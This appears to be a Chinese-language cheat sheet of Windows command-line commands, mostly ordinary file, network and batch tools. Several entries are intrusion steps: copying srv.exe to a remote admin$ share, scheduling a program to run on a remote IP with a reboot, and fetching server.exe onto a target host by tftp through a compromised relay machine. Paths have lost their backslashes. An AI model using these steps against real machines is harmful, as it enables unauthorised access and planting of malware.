del -F 文件名 加-F參數后就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如“DEL/AR *.*”表示刪除當前目錄下所有只讀文件，“DEL/A-S *.*”表示刪除當前目錄下除系統文件以外的所有文件

del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。（二個命令作用相同） 
move 盤符路徑要移動的文件名　存放移動文件的路徑移動后文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋 
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命令 
at id號 開啟已注冊的某個計划任務 
at /delete 停止所有計划任務，用參數/yes則不需要確認就直接停止 
at id號 /delete 停止某個已注冊的計划任務 
at 查看所有的計划任務 
at ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機 
finger username @host 查看最近有哪些用戶登陸 
telnet ip 端口 遠和登陸服務器,默認端口為23 
open ip 連接到IP（屬telnet登陸后的命令） 
telnet 在本機上直接鍵入telnet 將進入本機的telnet 
copy 路徑文件名1　路徑文件名2 /y 復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件 
copy c:srv.exe ipadmin$ 復制本地c:srv.exe到對方的admin下 
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件 
copy ipadmin$svv.exe c: 或:copyipadmin$*.* 復制對方admini$共享下的srv.exe文件（所有文件）至本地C： 
xcopy 要復制的文件或目錄樹　目標地址目錄名 復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件

ver 在DOS窗口下顯示版本信息 
winver 彈出一個窗口顯示版本信息（內存大小、系統版本、補丁版本、計算機名） 
format 盤符 /FS:類型 格式化磁盤,類型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS 
md　目錄名 創建目錄 
replace 源文件　要替換文件的目錄 替換文件 
ren 原文件名　新文件名 重命名文件名 
tree 以樹形結構顯示出目錄，用參數-f 將列出第個文件夾中文件名稱 
type 文件名 顯示文本文件的內容 
more 文件名 逐屏顯示輸出文件 
doskey 要鎖定的命令＝字符
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行，重新調用win2k命令，並創建宏)。如：鎖定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解鎖：doskey dir= 
taskmgr 調出任務管理器 
chkdsk /F D: 檢查磁盤D並顯示狀態報告；加參數/f並修復磁盤上的錯誤 
tlntadmn telnt服務admn,鍵入tlntadmn選擇3，再選擇8,就可以更改telnet服務默認端口23為其它任何端口 
exit 退出cmd.exe程序或目前，用參數/B則是退出當前批處理腳本而不是cmd.exe 
path 路徑可執行文件的文件名 為可執行文件設置一個路徑。 
cmd 啟動一個win2K命令解釋窗口。參數：/eff、/en 關閉、開啟命令擴展；更我詳細說明見cmd /? 
regedit /s 注冊表文件名 導入注冊表；參數/S指安靜模式導入，無任何提示； 
regedit /e 注冊表文件名 導出注冊表 
cacls 文件名　參數 顯示或修改文件訪問控制列表（ACL）——針對NTFS格式時。參數：/D 用戶名:設定拒絕某用戶訪問；/P 用戶名:perm 替換指定用戶的訪問權限；/G 用戶名:perm 賦予指定用戶訪問權限；Perm 可以是: N 無，R 讀取， W 寫入， C 更改(寫入)，F 完全控制；例：cacls D: est.txt /D pub 設定d: est.txt拒絕pub用戶訪問。 
cacls 文件名 查看文件的訪問用戶權限列表 
REM 文本內容 在批處理文件中添加注解 
netsh 查看或更改本地網絡配置情況
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:server.exe 登陸后，將“IP”的server.exe下載到目標主機c:server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送 
tftp -i 對方IP　put c:server.exe 登陸后，上傳本地c:server.exe至主機 
ftp ip 端口 用於上傳文件至服務器或進行文件操作，默認端口為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文本文件時) 
route print 顯示出IP路由，將主要顯示網絡地址Network addres，子網掩碼Netmask，網關地址Gateway addres，接口地址Interface 
arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息 
start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令 
mem 查看cpu使用情況 
attrib 文件名(目錄名) 查看某文件（目錄）的屬性 
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔，只讀，系統，隱藏 屬性；用＋則是添加為某屬性 
dir 查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間 
date /t 、 time /t 使用此參數即“DATE/T”、“TIME/T”將只顯示當前日期和時間，而不必輸入新日期和時間 
set 指定環境變量名稱=要指派給變量的字符 設置環境變量 
set 顯示當前所有的環境變量 
set p(或其它字符) 顯示出當前以字符p(或其它字符)開頭的所有環境變量 
pause 暫停批處理程序，並顯示出：請按任意鍵繼續.... 
if 在批處理程序中執行條件處理（更多說明見if命令及變量） 
goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如：“：start”標簽） 
call 路徑批處理文件名 從批處理程序中調用另一個批處理程序 （更多說明見call /?） 
for 對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變量） 
echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置 
echo 信息 在屏幕上顯示出信息 
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中 
findstr "Hello" aa.txt 在aa.txt文件中尋找字符串hello 
find 文件名 查找某文件 
title 標題名字 更改CMD窗口標題名字 
color 顏色值 設置cmd控制台前景和背景顏色；0＝黑、1＝藍、2＝綠、3＝淺綠、4＝紅、5＝紫、6＝黃、7=白、8=灰、9=淡藍、A＝淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白 
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:、D:統一改為：EntSky )